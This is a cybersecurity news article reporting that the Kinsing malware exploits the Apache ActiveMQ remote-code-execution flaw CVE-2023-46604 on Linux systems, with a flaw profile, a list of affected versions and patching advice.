Hackers Infect Linux Machines with Rootkits via Apache ActiveMQ Vulnerability

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Post Sharing

Apache ActiveMQ is a Java-based open-source protocol that allows distributed applications to exchange messages.

It uses the JMS API to provide a dependable messaging platform for sharing data across systems written in diverse programming languages.

It includes the following features:-

  • STOMP
  • Jakarta Messaging (JMS)
  • OpenWire

Trend Micro researchers recently revealed that the Apache ActiveMQ vulnerability (CVE-2023-46604) was actively exploited for Kinsing malware infection on Linux systems. The vulnerability causes RCE due to unvalidated throwable class type in OpenWire commands.

html
Document

Free Webinar

Live API Attack Simulation Webinar

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Hackers Infect Linux Machines

Kinsing malware rapidly spreads across a network by infiltrating servers, and it primarily targets Linux systems by exploiting vulnerable web apps or containers that are misconfigured.

Besides this, Kinsing actors exploit CVE-2023-4911 (Looney Tunables) to deploy cryptocurrency-mining scripts, damaging infrastructure and causing performance decline on infected systems.

Moreover, this protocol is suited for high-performance communications, which is critical in businesses. The existence of the validateIsThrowable function in the BaseDataStreamMarshall class is revealed by patch differences.

The validateIsThrowable method (Source – Trend Micro)

Failure to check the Throwable class type in the marshaller might result in unexpected class formation and execution, creating RCE vulnerabilities.

It is critical to provide continual validation of the Throwable class type in order to avoid any security issues.

November saw active exploitation reports, particularly of CVE-2023-46604, by threat actors, including HelloKitty ransomware. Low overall detections were noted despite a high CVSS score of 9.8, with proof-of-concept exploits like-

  • Metasploit
  • Nuclei

Using the ProcessBuilder method, the Kinsing malware exploits “CVE-2023-46604” then downloads the cryptocurrency miners and malware. 

Then, for a full system compromise, it actively hunts and eliminates rival miners, ensuring persistence through cronjobs and rootkit in /etc/ld.so.preload.

Flaw profile

  • CVE ID: CVE-2023-46604
  • Description: The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath.
  • Base Score: 9.8
  • Severity: Critical
  • NVD Published Date: 10/27/2023
  • NVD Last Modified: 11/20/2023
  • Source: Apache Software Foundation

Affected ActiveMQ versions

Here below we have mentioned all the affected ActiveMQ versions:-

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

The widespread exploitation of CVE-2023-46604, notably by Kinsing malware, poses a significant global security risk. 

That’s why urgent action is needed for Apache ActiveMQ users to patch and mitigate Kinsing threats. As mitigations and for a robust cybersecurity strategy, researchers recommended:-

  • Regular patching
  • Configuration audits
  • Network monitoring

Experience how StorageGuard eliminates the security blind spots in your storage systems by trying a 14-day free trial.